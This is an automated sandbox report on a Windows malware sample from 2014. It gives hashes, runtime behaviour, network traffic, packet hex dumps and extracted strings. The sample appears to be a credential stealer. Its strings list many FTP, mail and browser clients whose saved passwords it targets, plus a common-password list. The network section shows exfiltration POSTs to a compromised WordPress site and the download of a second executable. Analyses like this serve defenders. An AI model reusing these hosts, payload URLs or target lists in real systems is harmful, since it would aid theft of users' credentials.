Analysis Date2014-09-21 21:08:44
MD5e604b5460941b0c94e60b1453ee2de3e
SHA1b1fdff460a97413a8df465910b5d33ca39a9de4f

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d68e6bd337614ed69fd3654577879058 sha1: ea802467c08aeffa7d01a40496f793a0eef24bd8 size: 73728
Section.rdata md5: ea55f1bb8edcc7d52cc0e03f8c79e7e9 sha1: 3961dc0a2888ccac22b88d8751f95a8d51f19f7f size: 4096
Section.data md5: 31ba974a8b4397f4b2d30fa650c48189 sha1: d4225878f6c2d61f5cf324abb8da3fea210aeafb size: 24576
Section.reloc md5: 3458b6a8cbe9672e146626adaa19f2be sha1: 10552542b81654ef7e1ac0ec41baf5a46d249b42 size: 8192
Timestamp2014-08-19 10:39:09
PackerStranik 1.3 Modula/C/Pascal
PEhash92a3064da840c58159a75b80f284373eb7e690f4
IMPhash65e9bbea53a9396550cbbe64462a7930

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\WinRAR\HWID ➝
NULL
Creates FilePIPE\samr
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\93093.bat
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ C:\WINDOWS\system32\cmd.exe

Network Details:

DNSmedcareparatransit.com
Type: A
192.186.235.6
DNStruongvietgroup.com
Type: A
221.132.33.23
HTTP POSThttp://medcareparatransit.com/wp-content/themes/Migos/zur.php
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windowz XP)
HTTP POSThttp://medcareparatransit.com/wp-content/themes/Migos/zur.php
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windowz XP)
HTTP GEThttp://truongvietgroup.com/wp-content/plugins/lube.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windowz XP)
Flows TCP192.168.1.1:1031 ➝ 192.186.235.6:80
Flows TCP192.168.1.1:1032 ➝ 192.186.235.6:80
Flows TCP192.168.1.1:1033 ➝ 221.132.33.23:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7770 2d636f6e 74656e74   POST /wp-content
0x00000010 (00016)   2f746865 6d65732f 4d69676f 732f7a75   /themes/Migos/zu
0x00000020 (00032)   722e7068 70204854 54502f31 2e300d0a   r.php HTTP/1.0..
0x00000030 (00048)   486f7374 3a206d65 64636172 65706172   Host: medcarepar
0x00000040 (00064)   61747261 6e736974 2e636f6d 0d0a4163   atransit.com..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000060 (00096)   742d456e 636f6469 6e673a20 6964656e   t-Encoding: iden
0x00000070 (00112)   74697479 2c202a3b 713d300d 0a436f6e   tity, *;q=0..Con
0x00000080 (00128)   74656e74 2d4c656e 6774683a 20323733   tent-Length: 273
0x00000090 (00144)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000a0 (00160)   6f73650d 0a436f6e 74656e74 2d547970   ose..Content-Typ
0x000000b0 (00176)   653a2061 70706c69 63617469 6f6e2f6f   e: application/o
0x000000c0 (00192)   63746574 2d737472 65616d0d 0a436f6e   ctet-stream..Con
0x000000d0 (00208)   74656e74 2d456e63 6f64696e 673a2062   tent-Encoding: b
0x000000e0 (00224)   696e6172 790d0a55 7365722d 4167656e   inary..User-Agen
0x000000f0 (00240)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000100 (00256)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000110 (00272)   20352e30 3b205769 6e646f77 7a205850    5.0; Windowz XP
0x00000120 (00288)   290d0a0d 0affbf9f f5edd393 f3207d2d   )............ }-
0x00000130 (00304)   38aaba04 286c5e5f faa360d7 5d763910   8...(l^_..`.]v9.
0x00000140 (00320)   a481de78 5227d8ee 517f2e4c 11968b88   ...xR'..Q..L....
0x00000150 (00336)   2914fdeb 2a16f76b 7bdedf76 621fdcf5   )...*..k{..vb...
0x00000160 (00352)   55ae1705 62fe5f73 83d7a7e0 124d2d96   U...b._s.....M-.
0x00000170 (00368)   c803b647 39f7f54d cd38fa27 420c73af   ...G9..M.8.'B.s.
0x00000180 (00384)   8056f2b2 24c34ff6 4bcebad0 6d88e17c   .V..$.O.K...m..|
0x00000190 (00400)   f7ee4c5d 1ee351ec c3a31b2e b50b4d66   ..L]..Q.......Mf
0x000001a0 (00416)   78fcc1a8 07d34c3a 1646ded7 1d340d83   x.....L:.F...4..
0x000001b0 (00432)   bade14ab 0fad85c9 71057bbe 08932f73   ........q.{.../s
0x000001c0 (00448)   ab7d9532 b25f1946 61c68d8d 607a52b1   .}.2._.Fa...`zR.
0x000001d0 (00464)   6ea8fd28 12407d46 4cd561ca 88f0f207   n..(.@}FL.a.....
0x000001e0 (00480)   6c2283d5 772d1846 61d2ebf4 6a566d34   l"..w-.Fa...jVm4
0x000001f0 (00496)   8bf7991e 33a38db8 bdefb4a7 298763b8   ....3.......).c.
0x00000200 (00512)   e41868dc b828a351 df9cfe59 ffdc3f55   ..h..(.Q...Y..?U
0x00000210 (00528)   e3f93510 e95a684d 6323a341 d794a450   ..5..ZhMc#.A...P
0x00000220 (00544)   7312e843 49c9e653 0a672230 6130f08a   s..CI..S.g"0a0..
0x00000230 (00560)   e79f6a23 1ebb                         ..j#..

0x00000000 (00000)   504f5354 202f7770 2d636f6e 74656e74   POST /wp-content
0x00000010 (00016)   2f746865 6d65732f 4d69676f 732f7a75   /themes/Migos/zu
0x00000020 (00032)   722e7068 70204854 54502f31 2e300d0a   r.php HTTP/1.0..
0x00000030 (00048)   486f7374 3a206d65 64636172 65706172   Host: medcarepar
0x00000040 (00064)   61747261 6e736974 2e636f6d 0d0a4163   atransit.com..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000060 (00096)   742d456e 636f6469 6e673a20 6964656e   t-Encoding: iden
0x00000070 (00112)   74697479 2c202a3b 713d300d 0a436f6e   tity, *;q=0..Con
0x00000080 (00128)   74656e74 2d4c656e 6774683a 20323733   tent-Length: 273
0x00000090 (00144)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000a0 (00160)   6f73650d 0a436f6e 74656e74 2d547970   ose..Content-Typ
0x000000b0 (00176)   653a2061 70706c69 63617469 6f6e2f6f   e: application/o
0x000000c0 (00192)   63746574 2d737472 65616d0d 0a436f6e   ctet-stream..Con
0x000000d0 (00208)   74656e74 2d456e63 6f64696e 673a2062   tent-Encoding: b
0x000000e0 (00224)   696e6172 790d0a55 7365722d 4167656e   inary..User-Agen
0x000000f0 (00240)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000100 (00256)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000110 (00272)   20352e30 3b205769 6e646f77 7a205850    5.0; Windowz XP
0x00000120 (00288)   290d0a0d 0affbf9f f5edd393 f3207d2d   )............ }-
0x00000130 (00304)   38aaba04 286c5e5f faa360d7 5d763910   8...(l^_..`.]v9.
0x00000140 (00320)   a481de78 5227d8ee 517f2e4c 11968b88   ...xR'..Q..L....
0x00000150 (00336)   2914fdeb 2a16f76b 7bdedf76 621fdcf5   )...*..k{..vb...
0x00000160 (00352)   55ae1705 62fe5f73 83d7a7e0 124d2d96   U...b._s.....M-.
0x00000170 (00368)   c803b647 39f7f54d cd38fa27 420c73af   ...G9..M.8.'B.s.
0x00000180 (00384)   8056f2b2 24c34ff6 4bcebad0 6d88e17c   .V..$.O.K...m..|
0x00000190 (00400)   f7ee4c5d 1ee351ec c3a31b2e b50b4d66   ..L]..Q.......Mf
0x000001a0 (00416)   78fcc1a8 07d34c3a 1646ded7 1d340d83   x.....L:.F...4..
0x000001b0 (00432)   bade14ab 0fad85c9 71057bbe 08932f73   ........q.{.../s
0x000001c0 (00448)   ab7d9532 b25f1946 61c68d8d 607a52b1   .}.2._.Fa...`zR.
0x000001d0 (00464)   6ea8fd28 12407d46 4cd561ca 88f0f207   n..(.@}FL.a.....
0x000001e0 (00480)   6c2283d5 772d1846 61d2ebf4 6a566d34   l"..w-.Fa...jVm4
0x000001f0 (00496)   8bf7991e 33a38db8 bdefb4a7 298763b8   ....3.......).c.
0x00000200 (00512)   e41868dc b828a351 df9cfe59 ffdc3f55   ..h..(.Q...Y..?U
0x00000210 (00528)   e3f93510 e95a684d 6323a341 d794a450   ..5..ZhMc#.A...P
0x00000220 (00544)   7312e843 49c9e653 0a672230 6130f08a   s..CI..S.g"0a0..
0x00000230 (00560)   e79f6a23 1ebb                         ..j#..

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   706c7567 696e732f 6c756265 2e657865   plugins/lube.exe
0x00000020 (00032)   20485454 502f312e 300d0a48 6f73743a    HTTP/1.0..Host:
0x00000030 (00048)   20747275 6f6e6776 69657467 726f7570    truongvietgroup
0x00000040 (00064)   2e636f6d 0d0a4163 63657074 3a202a2f   .com..Accept: */
0x00000050 (00080)   2a0d0a41 63636570 742d456e 636f6469   *..Accept-Encodi
0x00000060 (00096)   6e673a20 6964656e 74697479 2c202a3b   ng: identity, *;
0x00000070 (00112)   713d300d 0a436f6e 6e656374 696f6e3a   q=0..Connection:
0x00000080 (00128)   20636c6f 73650d0a 55736572 2d416765    close..User-Age
0x00000090 (00144)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000a0 (00160)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000b0 (00176)   4520352e 303b2057 696e646f 777a2058   E 5.0; Windowz X
0x000000c0 (00192)   50290d0a 0d0a7472 65616d0d 0a436f6e   P)....tream..Con
0x000000d0 (00208)   74656e74 2d456e63 6f64696e 673a2062   tent-Encoding: b
0x000000e0 (00224)   696e6172 790d0a55 7365722d 4167656e   inary..User-Agen
0x000000f0 (00240)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000100 (00256)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000110 (00272)   20352e30 3b205769 6e646f77 7a205850    5.0; Windowz XP
0x00000120 (00288)   290d0a0d 0affbf9f f5edd393 f3207d2d   )............ }-
0x00000130 (00304)   38aaba04 286c5e5f faa360d7 5d763910   8...(l^_..`.]v9.
0x00000140 (00320)   a481de78 5227d8ee 517f2e4c 11968b88   ...xR'..Q..L....
0x00000150 (00336)   2914fdeb 2a16f76b 7bdedf76 621fdcf5   )...*..k{..vb...
0x00000160 (00352)   55ae1705 62fe5f73 83d7a7e0 124d2d96   U...b._s.....M-.
0x00000170 (00368)   c803b647 39f7f54d cd38fa27 420c73af   ...G9..M.8.'B.s.
0x00000180 (00384)   8056f2b2 24c34ff6 4bcebad0 6d88e17c   .V..$.O.K...m..|
0x00000190 (00400)   f7ee4c5d 1ee351ec c3a31b2e b50b4d66   ..L]..Q.......Mf
0x000001a0 (00416)   78fcc1a8 07d34c3a 1646ded7 1d340d83   x.....L:.F...4..
0x000001b0 (00432)   bade14ab 0fad85c9 71057bbe 08932f73   ........q.{.../s
0x000001c0 (00448)   ab7d9532 b25f1946 61c68d8d 607a52b1   .}.2._.Fa...`zR.
0x000001d0 (00464)   6ea8fd28 12407d46 4cd561ca 88f0f207   n..(.@}FL.a.....
0x000001e0 (00480)   6c2283d5 772d1846 61d2ebf4 6a566d34   l"..w-.Fa...jVm4
0x000001f0 (00496)   8bf7991e 33a38db8 bdefb4a7 298763b8   ....3.......).c.
0x00000200 (00512)   e41868dc b828a351 df9cfe59 ffdc3f55   ..h..(.Q...Y..?U
0x00000210 (00528)   e3f93510 e95a684d 6323a341 d794a450   ..5..ZhMc#.A...P
0x00000220 (00544)   7312e843 49c9e653 0a672230 6130f08a   s..CI..S.g"0a0..
0x00000230 (00560)   e79f6a23 1ebb                         ..j#..


Strings
..
\
\
  

cmd.exe
 /c start "" "%s"
Info
jjjj
jjjjjj
runas
:&:,:\:
000000
0 0&000K0
0 0&0/050I0R0X0a0g0
0'020<0E0P0u0
0"0G0R0w0
0$0Y0u0
0#191H1.2C2Z2o2
:$:*:0:6:<:B:H:N:T:Z:`:f:l:r:x:~:
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
<0=A=U=o=t=y=
<0<C<V<o<
?0E0O0j0
111111
11111111
112233
1*1E1`1{1
1<1x1}1
123123
123321
123456
1234567
12345678
123456789
1234567890
123abc
123qwe
1G132P2
1Q1_1x1
1q2w3e
1q2w3e4r
20292M2
'2, /+0&7!4-)1#
2,21272H2R2b2l2
222222
2/3e3y3
2+3U3p3
2.5.29.37
;2;E;`;
2G3M3Z3m3
\32BitFtp.ini
3"3&3*3.32363:3>3B3F3J3N3R3V3Z3^3b3f3j3n3r3v3z3~3
;3+#>6.&
394?4L4^4d4q4
:3;9;F;Z;_;
\3D-FTP
3D-FTP
4%414s4
4"4&4*4.42464:4>4B4F4J4N4R4V4Z4^4b4f4j4n4r4v4
4/4J4t4
4je[9dmgi4hoD;viKd4m
=/=4=N=S=
51565<5I5N5T5a5f5l5y5~5
5%50565<5A5G5P5V5`5~5
5f6r6|6
607I7X7a7g7
616D6X6l6
654321
657;7H7M7Y7_7s7x7
6%606@6H6S6
666666
6$666;6M6R6d6i6{6
6)6:6R6f6w6
6&686D6V6b6t6
6?6K6]6i6{6
>6>N>j>
6':;:p:
=6>S>f>
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
7777777
7^8c8t8y8
;+;7;'<]<b<
:":7:S:g:
8*8/848:8G8L8Q8p8
888=8F8T8e8
8+8E8S8
8=8h8m8|8
8.8M8l8u8~8
8 9+909?9D9J9X9i9
8$9A9`9
8^9k9-:A:l:{:
;/<8<A<J<Z<
8I9Z9k9
;8<I<V<
8L9X9b9
9):.:[:
9|$4r4
9"9(9.949:9@9F9L9R9X9^9d9j9p9v9|9
9#9(9=9B9G9L9Q9V9n9
9*9/9H9]9b9h9|9
9!9j9s9
9"9Z9l9
9D$(ub
?'?9?E?W?c?z?
<&=9=M=a=
9':Q:l:
9W9*;T;];f;
aaaaaa
abc123
Accept: */*
Accept-Encoding: identity, *;q=0
account.cfg
account.cfn
\Accounts
accounts.ini
\AceBIT
addrbk.dat
adidas
AdjustTokenPrivileges
Administrative Tools
advapi32.dll
:*:A:g:
AllocateAndInitializeSid
amanda
=#=/=A=M=d=p=4?G?V?
andrew
angel1
angels
anthony
aPLib v1.01  -  the smaller the better :)
AppData
AppDir
asdfasdf
asdfgh
ashley
asshole
austin
bailey
banana
bandit
baseball
\BatMail
batman
benjamin
billgates
biteme
\BitKinex
bitkinex.ds
>)>B>K>T>\>
blabla
blahblah
BlazeFtp
\BlazeFtp
blessed
blessing
blink182
bookmark.dat
\Bromium
bubbles
\BulletProof Software
buster
Buttons
C7N7Y7d7
canada
cassie
CertCloseStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
charlie
CheckTokenMembership
cheese
chelsea
chicken
christ
\ChromePlus
\Chromium
church
;	<(<><C<I<^<c<i<
Client Hash
CloseHandle
closesocket
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
cocacola
CoCreateGuid
CoCreateInstance
\CoffeeCup Software
CoInitializeEx
Common Administrative Tools
Common AppData
Common Documents
\Comodo
compaq
computer
Config Path
connect
Connection: close
Connections.txt
CONSTRAINT
Content-Encoding: binary
Content-Length:
Content-Length: %lu
Content-Type: application/octet-stream
ConvertSidToStringSidA
cookie
Cookies
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.
corvette
CoTaskMemFree
CoUninitialize
CreateDirectoryA
CreateFileA
CreateFileMappingA
CreateStreamOnHGlobal
CreateToolhelp32Snapshot
creative
CredentialCheck
CredentialSalt
CredEnumerateA
CredFree
crypt32.dll
CryptAcquireCertificatePrivateKey
CryptDestroyKey
CryptExportKey
CryptGetUserKey
CryptReleaseContext
CryptUnprotectData
\CuteFTP
CUTEFTP
\Cyberduck
D$0;D$(
dakota
dallas
daniel
danielle
@.data
DataDir
DataDirBak
DataFolder
DataPath
%d.bat
Default
DEFDIR
 del 	  %0 
     del    	 %1  
DeleteFileA
DeluxeFTP
destiny
%d.exe
dexter
diamond
digital
Dir #%d
Directory
DisplayName
<?<D<J<n<s<y<
;'<d=j=w=
+D$P][_^
DPAPI: 
dragon
\drives.js
EasyFTP
EmailAddress
eminem
emmanuel
\Epic\Epic
ESTdb2.dat
\Estsoft\ALFTP
ExitProcess
ExpandEnvironmentStringsA
\ExpanDrive
ExpanDrive_Home
explorer.exe
FastStone Browser
FastTrack
Favorites.dat
\FileZilla
\filezilla.xml
FindClose
FindFirstFileA
FindNextFileA
FindWindowA
Firefox
fireFTPsites.dat
\FlashFXP\3
\FlashFXP\4
\Flock\Browser\
flower
Folder
foobar
football
football1
FOREIGN
forever
freedom
FreeSid
FreshFTP
friend
friends
\Frigate3
FSProtocol
ftp://
FTP Commander
FTPCON
FTP CONTROL
FTP Count
FTP destination catalog
FTP destination password
FTP destination port
FTP destination server
FTP destination user
FtpDirectory
\FTP Explorer
FTP File%d
\FTPGetter
\FTPInfo
FtpIniName
ftplast.osd
FTP++.Link\shell\open\command
FTPList.db
ftplist.txt
FTP Navigator
FTPNow
FTP Now
FtpPassword
_FtpPassword
FtpPort
FTP profiles
\FTPRush
FtpServer
FTPShell
ftpshell.fsi
ftpsite.ini
FtpSite.xml
FtpUserName
FTPVoyager.ftp
FTPVoyager.qc
fuckoff
fuckyou
fuckyou1
full address:s:
:f:x:}:
gateway
genesis
george
GetCurrentDirectoryA
GetCurrentProcess
GetFileAttributesA
GetFileSize
GetHGlobalFromStream
gethostbyname
GetLastError
GetLocaleInfoA
GetModuleBaseNameW
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetNativeSystemInfo
GetPrivateProfileIntA
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
GetProcAddress
GET %s HTTP/1.0
GetSidSubAuthority
GetSidSubAuthorityCount
GetSystemInfo
GetTempPathA
GetTickCount
GetTokenInformation
GetUserNameA
GetVersionExA
GetVersionExW
GetWindowLongA
GetWindowsDirectoryA
gfhjkm
ghbdtn
\GHISLER
ginger
\Global Downloader
GlobalLock
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP Lite
\GlobalSCAPE\CuteFTP Pro
GlobalUnlock
google
\Google\Chrome
\GPSoftware\Directory Opus
guitar
h0n0{0
hahaha
hannah
hardcore
harley
heaven
hello1
helpme
History
\History.dat
History.dat
:#:):H:M:S:r:w:
hockey
HostAdrs
HostDirName
Hostname
HostName
Host: %s
hotdog
:H:R:q:
http://
<HTTPMail_Password2
HTTPMail Password2
HTTPMail Server
HTTPMail User Name
http://medcareparatransit.com/wp-content/themes/Migos/zur.php
HTTP Password
https://
HTTP Server URL
http://truongvietgroup.com/wp-content/plugins/lube.exe
HTTP User
hunter
identification
identities
Identities
identitymgr
	if  		 exist 	   %1  	  goto 	
ilovegod
iloveyou
iloveyou!
iloveyou1
iloveyou2
IMAP Password
<IMAP_Password2
IMAP Password2
IMAP Port
IMAP Server
IMAP User
IMAP User Name
ImpersonateLoggedOnUser
inet_addr
inetcomm server passwords
InitialDirectory
InitialPath
\INSoftware\NovaFTP
InstallDir
Install_Dir
InstallDir1
InstallerDathPath
installpath
InstallPath
Install Path
internet
InternetCrackUrlA
InternetCreateUrlA
Internet Explorer
\Ipswitch
\Ipswitch\WS_FTP
IsRelative
IsTextUnicode
IsWow64Process
=@=]=j=
jasmine
jasper
<*<J<e<
jennifer
jessica
jesus1
john316
jordan
jordan23
joseph
joshua
junior
justin
kernel32.dll
killer
kitten
\K-Meleon
K-Meleon
knight
	   :ktk   
L$(9L$@
LastAddress
Last Directory3
Last Install Path
LastPassword
LastPort
Last Server Host
Last Server Pass
Last Server Path
Last Server Port
Last Server Type
Last Server User
LastSessionFile
LastUser
LCMapStringA
leapftp
\LeapWare\LeapFTP
letmein
LoadLibraryA
LoadUserProfileA
LocalAlloc
Local AppData
LocalDir
LocalFree
Location:
Login Data
logins
LogonUserA
london
looking
LookupPrivilegeValueA
lovely
loving
+L$PRQW
?(?L?Q?z?
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrlenA
lstrlenW
=">M>_>
maggie
Mailbox.ini
\MapleStudio\ChromePlus
MapViewOfFile
master
matrix
matthew
maverick
maxwell
memset
merlin
michael
michelle
mickey
microsoft
\Microsoft\Windows Live Mail
\Microsoft\Windows Mail
Microsoft_WinInet_*
monkey
More information: http://www.ibsensoftware.com/
mother
Mozilla
\Mozilla\Firefox\
\Mozilla\Profiles\
\Mozilla\SeaMonkey\
mozsqlite3.dll
msi.dll
MS IE FTP Passwords
MsiGetComponentPathA
msvcrt.dll
muffin
MultiByteToWideChar
mustang
mustdie
My Documents
My FTP
mylove
My Pictures
myspace1
nathan
NDSites.ini
netapi32.dll
NetApiBufferFree
\NetDrive
\NetSarang
NetUserEnum
NexusFile
\Nichrome
nicole
nintendo
NNTP Email Address
NNTP Password
NNTP Password2
NNTP Server
NNTP User Name
\Notepad++
nothing
NovaFTP.db
NppFTP.xml
nss3.dll
NSSBase64_DecodeBuffer
NSS_Init
NSS_Shutdown
.oeaccount
ole32.dll
OleInitialize
onelove
online
OpenProcess
OpenProcessToken
Opera.HTML\shell\open\command
\Opera Software\Opera Next
\Opera Software\Opera Stable
orange
\Orbitum
origin_url
?!?&?+?o?t?z?
Outlook
outlook account manager passwords
passw0rd
password
"password" : "
Password
_Password
PassWord
password1
password 51:b:
PasswordType
password_value
PathAppendW
PathToExe
peaches
peanut
pepper
Personal
PK11_Authenticate
PK11_FreeSlot
PK11_GetInternalKeySlot
PK11SDR_Decrypt
\Pocomail
\PocoSystem.ini
pokemon
POP3 Password
<POP3_Password2
POP3 Password2
POP3 Port
POP3 Server
POP3 User
POP3 User Name
PopAccount
PopPassword
PopPort
PopServer
PortNumber
POST %s HTTP/1.0
praise
prayer
prefs.js
PRIMARY
prince
princess
Process32First
Process32Next
ProcessIdToSessionId
Profile
\Profiles
profiles.ini
profiles.xml
Program
ProgramDir
project.ini
psapi.dll
PSQRWV
pstorec.dll
PStoreCreateInstance
purple
qazwsx
QCHistory
QData.dat
;+;Q;_;m;
quick.dat
\Quick.dat
>Q?V?\?p?
qwerty
qwerty1
rachel
rainbow
`.rdata
ReadFile
\recentservers.xml
red123
RegCloseKey
RegCreateKeyA
RegEnumKeyExA
RegEnumValueA
RegOpenCurrentUser
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
RemoteDir
Remote Dir
RemoteDirectory
RevertToSelf
\RhinoSoft.com
richard
robert
\RockMelt
RootDirectory
rotimi
RushSite.xml
      "%s"   
S-1-5-18
samantha
samuel
scooby
scooter
SeaMonkey
SeAssignPrimaryTokenPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SECITEM_FreeItem
SeCreateTokenPrivilege
secret
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
select
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
SeRestorePrivilege
Server
Server.Host
ServerList.xml
ServerName
Server.Pass
Server.Port
servers.xml
ServerType
Server Type
Server.User
\Sessions
SeTcbPrivilege
SetCurrentDirectoryA
setsockopt
<setting name="
SetUnhandledExceptionFilter
shadow
shalom
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\SharedSettings.ccs
\SharedSettings.sqlite
shell32.dll
ShellExecuteA
ShellExecuteExW
Shell_TrayWnd
SHGetFolderPathA
SHGetFolderPathW
shlwapi.dll
signons2.txt
signons3.txt
signons.sqlite
signons.txt
silver
single
site.dat
\SiteDesigner
SiteInfo.QFP
\sitemanager.xml
\Sites
Sites\
sites.dat
\Sites.dat
sites.db
SitesDir
SiteServer %d\Host
SiteServer %d\Remote Directory
SiteServer %d\SFTP
SiteServer %d-User
SiteServer %d-User PW
SiteServer %d\WebUrl
SiteServers
sites.ini
\sites.xml
sites.xml
%s\Keychain
slayer
SM.arch
\SmartFTP
\sm.dat
smokey
SmtpAccount
SMTP Email Address
SmtpPassword
SMTP Password
<SMTP_Password2
SMTP Password2
SmtpPort
SMTP Port
SmtpServer
SMTP Server
SMTP User
SMTP User Name
snoopy
soccer
soccer1
socket
Software\AceBIT
Software\Adobe\Common
Software\BPFTP
Software\BPFTP\Bullet Proof FTP\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BulletProof Software\BulletProof FTP Client\Options
Software\ChromePlus
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
Software\CoffeeCup Software
Software\CoffeeCup Software\Internet\Profiles
Software\Cryer\WebSitePublisher
Software\ExpanDrive
Software\ExpanDrive\Sessions
Software\Far2\Plugins\FTP\Hosts
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\Plugins\FTP\Hosts
Software\Far Manager\SavedDialogHistory\FTPHost
Software\Far\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\FileZilla
Software\FileZilla Client
Software\FlashFXP
Software\FlashFXP\3
Software\FlashFXP\4
Software\FlashPeak\BlazeFtp\Settings
Software\FTPClient\Sites
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
Software\FTPWare\COREFTP\Sites
Software\Ghisler\Total Commander
Software\Ghisler\Windows Commander
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
Software\IncrediMail
SOFTWARE\LeapWare
Software\LeechFTP
Software\LinasFTP\Site Manager
Software\Martin Prikryl
Software\MAS-Soft\FTPInfo\Setup
Software\Microsoft\Internet Account Manager
Software\Microsoft\Internet Account Manager\Accounts
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Mozilla
Software\NCH Software\ClassicFTP\FTPAccounts
SOFTWARE\NCH Software\Fling\Accounts
Software\Nico Mak Computing\WinZip\FTP
Software\Nico Mak Computing\WinZip\mru\jobs
_Software\Opera Software
Software\Poco Systems Inc
Software\RimArts\B2\Settings
Software\RIT\The Bat!
Software\RIT\The Bat!\Users depot
SOFTWARE\Robo-FTP 3.7\FTPServers
SOFTWARE\Robo-FTP 3.7\Scripts
Software\SimonTatham\PuTTY\Sessions
Software\SoftX.org\FTPClient\Sites
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\South River Technologies\WebDrive\Connections
Software\TurboFTP
Software\VanDyke\SecureFX
Software\WinRAR
sparky
spirit
sqlite3_close
sqlite3_column_blob
sqlite3_column_bytes
sqlite3.dll
sqlite3_open
sqlite3_prepare
sqlite3_step
SQLite format 3
Staff-FTP
startrek
starwars
STATUS-IMPORT-OK
stella
StgOpenStorage
StrCmpNIA
StrRChrIA
StrStrA
StrStrIA
StrStrIW
StrToIntA
summer
sunshine
superman
tahO]A
taylor
Technology
tEh3kA
tEhIkA
tEh	lA
tEhsbA
TerminalType
TERMSRV/
TERMSRV/*
testing
testtest
tFhnHA
t#h>]A
\The Bat!
!This program cannot be run in DOS mode.
t=hnHA
t-hnHA
t.hnHA
t(hnHA
thomas
t|hsfA
tHSPPj%P
thunder
Thunderbird
\Thunderbird
tigger
tKh!YA
TMTPWDFILE0TMTPKDFILE0TMTCRYPTED0TMT1.0
tNh9[A
trinity
trustno1
tshZUA
\TurboFTP
uehvhA
u hnHA
UltraFXP
uM9l$D}G
UninstallString
UNIQUE
unleap.exe
UnloadUserProfile
UnmapViewOfFile
user32.dll
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windowz XP)
user.config
userenv.dll
UserID
Username
UserName
username:s:
username_value
V4`4j4t4~4
v89l$D|0
value="
_VanDyke\Config\Sessions
victory
\Visicom Media
_vsnwprintf
VWhQeA
VWPSQR
WaitForSingleObject
wand.dat
wcx_ftp.ini
Web Data
welcome
whatever
WideCharToMultiByte
william
windows
winex="
WinFTP
WininetCacheCredentials
wininet.dll
\win.ini
winner
wisdom
wiseftp.ini
wiseftpsrvs.bin
wiseftpsrvs.ini
Working Directory
WriteFile
WSAStartup
WS_FTP
wsock32.dll
wsprintfA
WTSGetActiveConsoleSessionId
:";';X;
xflags
\Yandex
zxcvbnm
^_ZY[X
ZY[X_^